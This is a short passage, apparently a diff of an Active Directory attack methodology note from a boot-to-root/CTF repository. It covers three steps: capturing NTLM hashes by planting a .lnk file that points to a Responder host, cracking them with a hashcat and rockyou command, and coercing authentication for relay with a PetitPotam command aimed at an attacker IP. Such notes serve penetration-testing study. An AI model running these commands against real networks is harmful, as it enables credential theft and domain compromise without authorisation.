H3llKa1ser/B00t2R00t/Methodology/Active Directory.md

 Then upload a .lnk file or similar to the target share/folder that points to our responder IP so that the victim will trigger the file and finally capture his hash.

         hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

+3) PetitPotam (Unauth) CVE-2022-26925

+If SMB signing is not enabled/enforced, you can conduct relay attacks.
+PetitPotam is one of them

+        python3 PetitPotam.py -d DOMAIN ATTACK_IP TARGET_IP